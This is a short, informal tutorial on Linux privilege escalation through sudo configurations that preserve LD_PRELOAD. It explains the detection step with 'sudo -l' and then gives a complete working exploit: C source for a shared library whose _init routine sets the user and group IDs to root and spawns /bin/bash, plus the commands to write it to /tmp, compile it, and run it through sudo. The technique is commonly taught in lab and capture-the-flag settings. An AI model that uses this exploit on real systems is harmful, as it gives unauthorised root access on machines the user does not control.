What is LD_PRELOAD?
LD_PRELOAD is an optional environmental variable holding one or more paths to shared libraries or shared objects, the loader will load it before any other shared library including the C runtime library libc.so this is also called as preloading a library.
To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.
Detection
Fire up terminal and type:
user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD
If output something like this, congratulations target is vulnerable and you can exploit the LD_PRELOAD issue to get root privilege shell and to accomplish privilege escalation you also need some sudo permission binary which uses LD_PRELOAD envr.
some Sudo command which can be done, current user.
Program File :
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
Exploit LD_PRELOAD.
open terminal and go to any Writable Directory for dropping shell.
writable directory like
- /tmp
- /var/tmp
- /dev/shm
in our case we using /tmp directory.
Drop an evil.c using any text editor, here we used cat for dropping shell.
user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF
lest Compile and make object file.
gcc -fPIC -shared -o evil.so evil.c -nostartfiles
Time to final step 3:)
sudo LD_PRELOAD=evil.so <COMMAND>
here <COMMAND> mean which command have u allowed to do with sudo.
you can use any sudo command which allowed to current user.
You Got a Shell!!!!!